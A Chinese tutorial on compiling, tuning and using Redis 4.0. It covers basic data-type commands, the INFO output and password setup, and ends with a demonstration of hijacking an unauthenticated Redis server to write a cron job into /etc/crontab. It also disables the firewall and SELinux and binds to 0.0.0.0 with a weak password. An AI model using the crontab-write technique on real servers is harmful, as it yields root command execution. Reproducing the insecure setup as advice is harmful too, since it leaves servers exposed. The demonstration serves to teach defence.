Redis4.0之持久化存储(上)
一,redis概述与实验环境说明
1.1 什么是redis
redis是一种内存型的NoSQL数据库,优点是快,常用来做缓存用
redis存储数据的方法是以key-value的形式
value类型支持字符串,列表,哈希等多种类型
1.2 环境说明
| 主机名 | IP | 用途 |
|---|---|---|
| redis01 | 192.168.200.70 | redis-master |
cat /etc/redhat-release
uname -r
systemctl stop firewalld
systemctl disable firewalld
setenforce 0
sestatus
1.3 yum仓库使用技巧
查找一个命令出自哪个rpm包
#查找一个命令出自哪个rpm包[root@Redis01 ~]# yum provides "*bin/ifconfig"net-tools-2.0-0.22.20131004git.el7.x86_64 : Basic networking tools源 :base匹配来源:文件名 :/sbin/ifconfig[root@Redis01 ~]# yum provides "*bin/brctl"bridge-utils-1.5-9.el7.x86_64 : Utilities for configuring the linux ethernet bridge源 :base匹配来源:文件名 :/usr/sbin/brctl[root@Redis01 ~]# yum provides "*bin/nslookup"32:bind-utils-9.9.4-61.el7.x86_64 : Utilities for querying DNS name servers源 :base匹配来源:文件名 :/usr/bin/nslookup
Redis所有包
链接:https://pan.baidu.com/s/1yEMChN6Cm3Hh1-lAVVpQ-A
提取码:ttun
二,Redis服务器4.0版本源码编译安装
2.1 redis下载地址
2.2 redis源码编译
yum -y install wget gcc gcc-c++ make tar openssl openssl-devel cmake
rpm -q wget gcc gcc-c++ make tar openssl openssl-devel cmake
tar xf redis-4.0.11.tar.gz -C /usr/src/
cd /usr/src/redis-4.0.11/
make && make MALLOC=jemalloc && make PREFIX=/usr/local/redis install --->MALLOC内存分配规则
cd /usr/local/redis/
ls
mkdir -p /usr/local/redis/conf
cp /usr/src/redis-4.0.11/redis.conf /usr/local/redis/conf/
cp /usr/src/redis-4.0.11/sentinel.conf /usr/local/redis/conf/
ln -s /usr/local/redis/bin/* /usr/local/bin/
which redis-server
redis-server --version #服务端连接命令
redis-cli --version #客户端连接命令
三,Redis服务器启动和系统参数调整
3.1 简化redis配置文件
pwd
cp conf/redis.conf{,.bak}
egrep -v "^$|^#" conf/redis.conf.bak > conf/redis.conf
mkdir -p /data/redis --->创建redis数据目录
3.2 更改redis配置文件/usr/local/redis/conf/redis.conf
修改redis配置文件以下参数
cat -n conf/redis.conf | sed -n '1p;3p;4p;7p;9p;11p;21p'
1 bind 127.0.0.13 port 63794 tcp-backlog 5117 daemonize no9 pidfile /var/run/redis_6379.pid11 logfile ""21 dir ./
修改成以下设置
vim conf/redis.conf
cat -n conf/redis.conf | sed -n '1p;3p;4p;7p;9p;11p'
1 bind 0.0.0.0 #监听地址3 port 6379 #监听端口4 tcp-backlog 1024 #tcp连接数7 daemonize yes #是否后台启动9 pidfile /data/redis/redis.pid #pid存放目录11 logfile "/data/redis/redis.log" #日志存放目录21 dir /data/redis/ #工作目录
3.3 redis服务器启动和关闭
启动redis服务器
redis-server /usr/local/redis/conf/redis.conf
netstat -antup | grep redis
关闭redis服务器
redis-cli shutdown
netstat -antup | grep redis
连接redis服务器
redis-server /usr/local/redis/conf/redis.conf
redis-cli --->不写默认是-p 6379 -h 127.0.0.1
exit --->退出交互界面
3.4 系统参数优化调整
启动redis以后,我们查看系统日志
cat /data/redis/redis.log
18476:M 09 Aug 22:14:47.500 # User requested shutdown...18476:M 09 Aug 22:14:47.500 * Saving the final RDB snapshot before exiting.18476:M 09 Aug 22:14:47.502 * DB saved on disk18476:M 09 Aug 22:14:47.502 * Removing the pid file.18476:M 09 Aug 22:14:47.502 # Redis is now ready to exit, bye bye...18483:C 09 Aug 22:14:50.394 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo18483:C 09 Aug 22:14:50.394 # Redis version=4.0.11, bits=64, commit=00000000, modified=0, pid=18483, just started18483:C 09 Aug 22:14:50.394 # Configuration loaded18484:M 09 Aug 22:14:50.395 * Increased maximum number of open files to 10032 (it was originally set to 1024). #警告提示1:系统文件描述符设置的太小了,才1024,我们最好设置到10032_.__.-``__ ''-.__.-`` `. `_. ''-._ Redis 4.0.11 (00000000/0) 64 bit.-`` .-```. ```\/ _.,_ ''-._( ' , .-` | `, ) Running in standalone mode|`-._`-...-` __...-.``-._|'` _.-'| Port: 6379| `-._ `._ / _.-' | PID: 18484`-._ `-._ `-./ _.-' _.-'|`-._`-._ `-.__.-' _.-'_.-'|| `-._`-._ _.-'_.-' | http://redis.io`-._ `-._`-.__.-'_.-' _.-'|`-._`-._ `-.__.-' _.-'_.-'|| `-._`-._ _.-'_.-' |`-._ `-._`-.__.-'_.-' _.-'`-._ `-.__.-' _.-'`-._ _.-'`-.__.-'18484:M 09 Aug 22:14:50.395 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.#警告提示2:对一个高负载的环境来说tcp设置128这个值,太小了。18484:M 09 Aug 22:14:50.395 # Server initialized18484:M 09 Aug 22:14:50.395 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.#警告提示3:overcommit_memory=0为不允许超额抢占内存,但是,rdb保存可能会失败。建议将vm.overcommit_memory = 1进行修改18484:M 09 Aug 22:14:50.395 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.#警告提示4:你的内核中启用了巨大内存页的支持,这将与redis的延迟内存使用冲突。18484:M 09 Aug 22:14:50.395 * DB loaded from disk: 0.000 seconds18484:M 09 Aug 22:14:50.396 * Ready to accept connections
(1)调整系统文件描述符
echo "* - nofile 10240" >> /etc/security/limits.conf
tail -1 /etc/security/limits.conf
这里我们只需要退出一下在登陆即可
ulimit -n
(2)调整系统tcp连接数
sysctl -a | grep soma
echo "net.core.somaxconn = 10240" >> /etc/sysctl.conf
sysctl -p
(3)调整系统内存分配策略
echo "vm.overcommit_memory = 1" >> /etc/sysctl.conf
tail -1 /etc/sysctl.conf
sysctl -p
sysctl -a | grep commit
sysctl: reading key "net.ipv6.conf.all.stable_secret"sysctl: reading key "net.ipv6.conf.default.stable_secret"sysctl: reading key "net.ipv6.conf.ens32.stable_secret"sysctl: reading key "net.ipv6.conf.lo.stable_secret"vm.nr_overcommit_hugepages = 0vm.overcommit_kbytes = 0vm.overcommit_memory = 1 #设置好了vm.overcommit_ratio = 50
(4)关闭系统内核的巨大内存页支持
echo never > /sys/kernel/mm/transparent_hugepage/enabled
cat /sys/kernel/mm/transparent_hugepage/enabled
echo never > /sys/kernel/mm/transparent_hugepage/defrag
cat /sys/kernel/mm/transparent_hugepage/defrag
添加到/etc/rc.local开机自动关闭系统内核的巨大内存页支持
echo 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' >> /etc/rc.local
echo 'echo never > /sys/kernel/mm/transparent_hugepage/defrag' >> /etc/rc.local
tail -2 /etc/rc.local
(5)重启redis-server验证修改
关闭redis并情况日志
redis-cli shutdown
netstat -antup | grep redis
> /data/redis/redis.log#清空日志
启动redis并查看日志
redis-server /usr/local/redis/conf/redis.conf
cat /data/redis/redis.log
17846:C 30 Dec 09:33:51.637 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo17846:C 30 Dec 09:33:51.637 # Redis version=4.0.11, bits=64, commit=00000000, modified=0, pid=17846, just started17846:C 30 Dec 09:33:51.637 # Configuration loaded_.__.-``__ ''-.__.-`` `. `_. ''-._ Redis 4.0.11 (00000000/0) 64 bit.-`` .-```. ```\/ _.,_ ''-._( ' , .-` | `, ) Running in standalone mode|`-._`-...-` __...-.``-._|'` _.-'| Port: 6379| `-._ `._ / _.-' | PID: 17847`-._ `-._ `-./ _.-' _.-'|`-._`-._ `-.__.-' _.-'_.-'|| `-._`-._ _.-'_.-' | http://redis.io`-._ `-._`-.__.-'_.-' _.-'|`-._`-._ `-.__.-' _.-'_.-'|| `-._`-._ _.-'_.-' |`-._ `-._`-.__.-'_.-' _.-'`-._ `-.__.-' _.-'`-._ _.-'`-.__.-'17847:M 30 Dec 09:33:51.641 # Server initialized17847:M 30 Dec 09:33:51.641 * DB loaded from disk: 0.000 seconds17847:M 30 Dec 09:33:51.641 * Ready to accept connections
四,Redis客户端使用和字符串简单操作
mysql命令用来跟MySQL服务器进行交互
redis-cli命令用来跟redis服务器进行交互
4.1 使用redis-cli客户端登陆redis-server
redis-cli
127.0.0.1:6379> exit
redis-cli -h localhost -p 6379
localhost:6379> exit
4.2 redis字符串操作
redis-cli
127.0.0.1:6379> set name Mr.sun #增加键(key)和值(value)OK127.0.0.1:6379> get name #根据键获取值"Mr.sun"127.0.0.1:6379> set name yunjisuan #修改键的值OK127.0.0.1:6379> get name"yunjisuan"127.0.0.1:6379> del name #删除,返回1代表删除成功(integer) 1127.0.0.1:6379> GET name #命令不区分大小写(nil)127.0.0.1:6379> set NAME testOK127.0.0.1:6379> get name(nil)127.0.0.1:6379> get NAME #key区分大小写"test"
4.3 非交互式操作redis服务器
redis-cli set name welcome
redis-cli get name
redis-cli del name
redis-cli get name
五,Redis列表集合简单操作
redis的key都是字符串,value支持字符串,列表,集合等
5.1 redis列表的操作,有序的可重复的
列表就是有顺序的,可重复的一堆值的组合
redis-cli
127.0.0.1:6379> lpush names yun1 #创建一个列表names,并从左边推入一个值yun1(integer) 1127.0.0.1:6379> lpush names yun2 #向列表names左边推入一个值yun2(integer) 2127.0.0.1:6379> lpush names yun3(integer) 3127.0.0.1:6379> lpush names yun(integer) 4127.0.0.1:6379> lpush names yun4(integer) 5127.0.0.1:6379> lpush names yun5(integer) 6127.0.0.1:6379> lrange names 0 -1 #查看列表names从索引0开始到结束所有的值1) "yun5"2) "yun4"3) "yun"4) "yun3"5) "yun2"6) "yun1"127.0.0.1:6379> lrange names 0 1 #查看索引0和1的值1) "yun5"2) "yun4"127.0.0.1:6379> lrange names 0 21) "yun5"2) "yun4"3) "yun"127.0.0.1:6379> lrange names 0 01) "yun5"127.0.0.1:6379> lrange names 0 51) "yun5"2) "yun4"3) "yun"4) "yun3"5) "yun2"6) "yun1"
127.0.0.1:6379> lpush names yun(integer) 7127.0.0.1:6379> lrange names 0 -11) "yun" #有两个yun2) "yun5"3) "yun4"4) "yun" #有两个yun5) "yun3"6) "yun2"7) "yun1"127.0.0.1:6379> lrem names 1 yun #从左边数删除第一个yun(integer) 1127.0.0.1:6379> lrange names 0 -11) "yun5"2) "yun4"3) "yun"4) "yun3"5) "yun2"6) "yun1"127.0.0.1:6379> lrem names 1 yun #从左边数删除第一个yun(integer) 1127.0.0.1:6379> lrange names 0 -11) "yun5"2) "yun4"3) "yun3"4) "yun2"5) "yun1"
127.0.0.1:6379> lpush names yun #从列表的左边加入一个元素yun(integer) 6127.0.0.1:6379> rpush names yun #从列表的右边加入一个元素yun(integer) 7127.0.0.1:6379> lrange names 0 -11) "yun"2) "yun5"3) "yun4"4) "yun3"5) "yun2"6) "yun1"7) "yun"127.0.0.1:6379> lrem names 0 yun #从列表的左边数删除所有的yun元素(integer) 2127.0.0.1:6379> lrange names 0 -11) "yun5"2) "yun4"3) "yun3"4) "yun2"5) "yun1"
127.0.0.1:6379> lpop names #移除列表最左边的元素"yun5"127.0.0.1:6379> lpop names"yun4"127.0.0.1:6379> lpop names"yun3"127.0.0.1:6379> lpop names"yun2"127.0.0.1:6379> lpop names"yun1"
127.0.0.1:6379> lpush names yun1(integer) 1127.0.0.1:6379> lpush names yun2(integer) 2127.0.0.1:6379> lpush names yun3(integer) 3127.0.0.1:6379> lpush names yun4(integer) 4127.0.0.1:6379> lpush names yun5(integer) 5127.0.0.1:6379> lrange names 0 -11) "yun5"2) "yun4"3) "yun3"4) "yun2"5) "yun1"127.0.0.1:6379> rpop names #移除列表最右边的元素"yun1"127.0.0.1:6379> rpop names"yun2"127.0.0.1:6379> rpop names"yun3"127.0.0.1:6379> lrange names 0 -11) "yun5"2) "yun4"127.0.0.1:6379> lset names 0 yun #修改列表左起第一个元素OK127.0.0.1:6379> lrange names 0 -11) "yun"2) "yun4"
5.2 redis集合的操作,无序的不重复的
集合就是不能重复的,无固定顺序的列表
127.0.0.1:6379> sadd ages 25 #向集合中添加元素(integer) 1127.0.0.1:6379> sadd ages 30(integer) 1127.0.0.1:6379> sadd ages 35(integer) 1127.0.0.1:6379> sadd ages 40(integer) 1127.0.0.1:6379> sadd ages 45(integer) 1127.0.0.1:6379> sadd ages 50(integer) 1127.0.0.1:6379> sadd ages 25 #失败,集合的元素具有唯一性(integer) 0127.0.0.1:6379> smembers ages #查看集合里的元素1) "25"2) "30"3) "35"4) "40"5) "45"6) "50"127.0.0.1:6379> srem ages 25 #移除即合里是25的元素(integer) 1127.0.0.1:6379> spop ages #随机移除集合里的一个元素"50"127.0.0.1:6379> smembers ages1) "30"2) "35"3) "40"4) "45"
127.0.0.1:6379> sismember ages 40 #查找集合里是否有40的元素(integer) 1127.0.0.1:6379> sismember ages 40(integer) 1127.0.0.1:6379> smembers ages #查看集合里的元素1) "30"2) "35"3) "40"4) "45"
六,Redis的hash和订阅简单操作
6.1 redis的hash操作
hash就是可以存多个键值对的组合(类似python字典)
127.0.0.1:6379> hset info name 'yunjisuan' #增加一个hash(integer) 1127.0.0.1:6379> hset info age 25(integer) 1127.0.0.1:6379> hset info location 'beijing'(integer) 1127.0.0.1:6379> hgetall info1) "name"2) "yunjisuan"3) "age"4) "25"5) "location"6) "beijing"127.0.0.1:6379> hget info name"yunjisuan"127.0.0.1:6379> hdel info name age(integer) 2127.0.0.1:6379> hgetall info1) "location"2) "beijing"127.0.0.1:6379> del info(integer) 1127.0.0.1:6379> hmset info name 'yunjisuan' age 25 location 'beijing'OK127.0.0.1:6379> hgetall info1) "name"2) "yunjisuan"3) "age"4) "25"5) "location"6) "beijing"
6.2 redis的订阅操作
开启redis的订阅功能
redis-cli
127.0.0.1:6379> subscribe yunjisuan #开启频道名:yunjisuan的订阅功能,可开启多个窗口进行订阅Reading messages... (press Ctrl-C to quit)1) "subscribe"2) "yunjisuan"3) (integer) 1
对频道进行内容推送
redis-cli
127.0.0.1:6379> publish yunjisuan 'welcome' #向频道yunjisuan推送welcome(integer) 2 #推送成功的人数
七,使用Shell往Redis批量添加数据
(1)批量往redis server上插入数据
for line in `seq -w 50`;do redis-cli set name_${line} value_${line};done
(2)查看key的情况
redis-cli
127.0.0.1:6379> keys * #查看所有key命令,不建议使用,上千万的key会使redis服务器堵塞127.0.0.1:6379> randomkey #随机返回一个key"name_44"127.0.0.1:6379> randomkey"name_10"127.0.0.1:6379> scan 0 #分页查看key1) "52"2) 1) "name_10"2) "name_34"3) "name_07"4) "name_47"5) "name_13"6) "NAME"7) "name_01"8) "name_33"9) "name_08"10) "names"127.0.0.1:6379> scan 11) "35"2) 1) "name_26"2) "name_05"3) "name_38"4) "name_16"5) "name_32"6) "name_40"7) "name_42"8) "name_39"9) "name_20"10) "name_06"
八,Redis服务器info状态信息查看
redis提供了一个info命令查看redis服务器的信息,类似Linux提供一个top命令查看系统的信息
redis-cli info
#Server服务器的信息redis_version:4.0.11 #redis服务器版本redis_git_sha1:00000000 #Git SHA1redis_git_dirty:0 #Git dirty flagredis_build_id:feb84973011f5402 #redis build idredis_mode:standalone #运行模式,单机或集群os:Linux 3.10.0-862.3.3.el7.x86_64 x86_64 #redis服务器宿主机操作系统arch_bits:64 #架构64位multiplexing_api:epoll #redis所使用的事件处理模型atomicvar_api:atomic-builtingcc_version:4.8.5 #编译redis时gcc版本process_id:19450 #redis服务器进程的pidrun_id:119ba49e27f25b118aaeb8829c60f32771906687 #redis服务器的随机标识符(sentinel和集群)tcp_port:6379 #redis服务器监听端口uptime_in_seconds:88667 #redis服务器启动总时间,单位秒uptime_in_days:1 #redis服务器启动总时间,单位天hz:10 #redis内部调度频率(关闭timeout客户端,删除过期key)lru_clock:7188187 #自增时间,用于LRU管理executable:/root/redis-serverconfig_file:/usr/local/redis/conf/redis.conf #配置文件路径# Clients 已连接客户端信息connected_clients:1 #已经连接客户端数量(不包括slave连接的客户端)client_longest_output_list:0 #当前连接的客户端当中,最长的输出列表client_biggest_input_buf:0 #当前客户端当中,最大输入缓存。blocked_clients:0 #正在等待阻塞命令的客户端数量# Memory 内存信息used_memory:853016 #由redis分配器分配的内存总量,单位字节used_memory_human:833.02K #以可读方式返回redis已分配的内存总量used_memory_rss:2457600 #从操作系统角度,返回redis已分配内存总量used_memory_rss_human:2.34M #以可读方式返回redis已分配的内存总量used_memory_peak:931760 #redis的内存消耗峰值(以字节为单位)used_memory_peak_human:909.92K #以可读方式返回redis内存消耗峰值used_memory_peak_perc:91.55%used_memory_overhead:838934used_memory_startup:786592used_memory_dataset:14082used_memory_dataset_perc:21.20%total_system_memory:1021898752total_system_memory_human:974.56Mused_memory_lua:37888 #lua引擎所使用的内存大小(单位字节)used_memory_lua_human:37.00Kmaxmemory:0maxmemory_human:0Bmaxmemory_policy:noevictionmem_fragmentation_ratio:2.88 #used_memory_rss和used_memory比率,小于1表示使用了swap,大于1表示碎片多,redis进行增加删除的动作,会引起内存碎片化mem_allocator:jemalloc-4.0.3 #编译时指定的redis的内存分配器。越好的分配器内存碎片化率越低,低版本建议升级active_defrag_running:0lazyfree_pending_objects:0# Persistence rdb和aof的持久化相关信息loading:0 #服务器是否正在载入持久化文件rdb_changes_since_last_save:0 #有多少个已经写入的命令还未被持久化rdb_bgsave_in_progress:0 #服务器是否正在创建rdb文件rdb_last_save_time:1533913162 #已经有多长时间没有进行持久化了rdb_last_bgsave_status:ok #最后一次的rdb持久化是否成功rdb_last_bgsave_time_sec:0 #最后一次生成rdb文件耗时秒数rdb_current_bgsave_time_sec:-1 #如果服务器正在创建rdb文件,那么当前这个记录就是创建操作耗时秒数rdb_last_cow_size:303104aof_enabled:0 #是否开启了aofaof_rewrite_in_progress:0 #标识aof的rewrite操作是否进行中aof_rewrite_scheduled:0aof_last_rewrite_time_sec:-1aof_current_rewrite_time_sec:-1aof_last_bgrewrite_status:ok #上次bgrewriteaof操作的状态aof_last_write_status:ok #上一次aof写入状态aof_last_cow_size:0# Stats 一般统计信息total_connections_received:129 #新创建的链接个数,如果过多,会影响性能total_commands_processed:226 #redis处理的命令数instantaneous_ops_per_sec:0 #redis当前的qps,redis内部较实时的每秒执行命令数total_net_input_bytes:8324 #redis网络入口流量字节数total_net_output_bytes:192093 #redis网络出口流量字节数instantaneous_input_kbps:0.00 #redis网络入口kpsinstantaneous_output_kbps:0.00 #redis网络出口kpsrejected_connections:0 #拒绝的连接个数,redis连接个数已经达到maxclients限制。sync_full:0 #主从完全同步成功次数sync_partial_ok:0 #主从部分同步成功次数sync_partial_err:0 #主从部分同步失败次数expired_keys:0 #运行以来过期的key的数量expired_stale_perc:0.00expired_time_cap_reached_count:0evicted_keys:0 #运行以来剔除(超过maxmemory)的key的数量keyspace_hits:29 #命中次数keyspace_misses:3 #没命中次数pubsub_channels:0 #当前使用中的频道数量pubsub_patterns:0 #当前使用的模式数量latest_fork_usec:92migrate_cached_sockets:0slave_expires_tracked_keys:0active_defrag_hits:0active_defrag_misses:0active_defrag_key_hits:0active_defrag_key_misses:0# Replication 主从信息role:masterconnected_slaves:0master_replid:3a56d66723917199a5a86317dfecefda5588c0ccmaster_replid2:0000000000000000000000000000000000000000master_repl_offset:0 #主从同步偏移量(主从数据不一致)second_repl_offset:-1repl_backlog_active:0repl_backlog_size:1048576repl_backlog_first_byte_offset:0repl_backlog_histlen:0# CPUused_cpu_sys:16.81used_cpu_user:8.75used_cpu_sys_children:0.02used_cpu_user_children:0.00# Cluster 集群相关信息cluster_enabled:0# Keyspace 数据库相关信息db0:keys=55,expires=0,avg_ttl=0 #db0的key数量以及带有生存周期的key的个数,平均存活时间
九,Redis服务器加密和无密码攻击演示
redis无密码如果放在公网的话,会被攻击
9.1 给redis增加密码的两种方式
(1)通过redis配置文件增加密码
给配置文件增加密码参数
echo 'requirepass "yunjisuan"' >> /usr/local/redis/conf/redis.conf
tail -1 /usr/local/redis/conf/redis.conf
redis-cli shutdown #重启redis
netstat -antup | grep redis
redis-server /usr/local/redis/conf/redis.conf
netstat -antup | grep redis
redis-cli
127.0.0.1:6379> keys *(error) NOAUTH Authentication required. #需要验证才能查看,密码起作用了127.0.0.1:6379> auth yunjisuan #通过auth 密码的方式进行验证OK127.0.0.1:6379> set name benetOK
非交互式输入密码进行登录
redis-cli -h 127.0.0.1 -p 6379 -a yunjisuan get name
Warning: Using a password with '-a' option on the command line interface may not be safe."benet"#警告:使用-a方式输入密码并不安全
(2)使用交互式的方式给redis增加密码(无需重启redis)
将之前在配置文件里设置的密码参数删除
tail -1 /usr/local/redis/conf/redis.conf
sed -i '$d' /usr/local/redis/conf/redis.conf
tail -1 /usr/local/redis/conf/redis.conf
重启redis-server
redis-cli -a yunjisuan shutdown
netstat -antup | grep redis
redis-server /usr/local/redis/conf/redis.conf
netstat -antup | grep redis
交互式登陆redis设置密码
redis-cli
127.0.0.1:6379> get name"benet"127.0.0.1:6379> config get requirepass #获取redis配置的密码信息1) "requirepass"2) "" #此时密码空127.0.0.1:6379> config set requirepass yunjisuan #给redis设置密码OK127.0.0.1:6379> config get requirepass(error) NOAUTH Authentication required. #密码即时生效127.0.0.1:6379> auth yunjisuan #进行密码验证OK127.0.0.1:6379> config get requirepass #查看密码配置信息1) "requirepass"2) "yunjisuan" #有密码了127.0.0.1:6379> config rewrite #将配置重写进行保存OK
查看redis配置文件最后两行
tail -2 /usr/local/redis/conf/redis.conf
# Generated by CONFIG REWRITErequirepass "yunjisuan" #增加了密码配置
9.2 入侵无密码redis服务器演示(事先清空了密码)
redis-cli -h 127.0.0.1 config set dir /etc/
redis-cli -h 127.0.0.1 config set dbfilename "crontab"
echo "* * * * * root echo 'attack'" >> /tmp/attack
vim /tmp/attack
cat /tmp/attack #这个文件内容上下必须各有两个回车
* * * * * root echo 'attack'
cat /tmp/attack | redis-cli -h 127.0.0.1 -x set attack
redis-cli -h 127.0.0.1 save
查看/etc/crontab文件
cat /etc/crontab
tail -f /var/log/cron
REDIS0008 redis-ver4.0.11redis-bitseêɭused-mem¨aof-preamble~𭠭e_2value_21ages(-2name_4value_45name_1value_18name_3value_31name_2value_28name_3value_33name_0value_02name_0value_01name_3value_37namesyunyun4ÿname_1value_17name_0value_04name_1value_10name_1value_19name_0value_03ninfo77-name29namyunjisuan08name_0value_05name_3value_34agelocationbeijingÿname_4value_40name_0value_06name_0value_07name_1value_13name_2value_25name_4value_41name_3value_38name_3value_36name_2value_20name_4value_42name_4value_48name_1value_15name_4value_46name_0value_09name_1value_11name_3value_35name_1value_16name_4value_47name_2value_27name_4value_43name_{linevalue_50NAMEtestname_5value_50name_2value_22name_2value_24name_3value_32name_3value_30name_4value_44attack!* * * * * root echo 'attack' #这里出现了这条定时任务,这条任务每分钟都会被触发name_4value_49name_3value_39name_1value_14name_2value_23namebenetname_1value_12name_2value_26您在/var/spool/mail/root 中有新邮件[root@Redis01 ~]# XshellXshellXshellXshellXshell#然后你的redis服务器就会被攻击了。
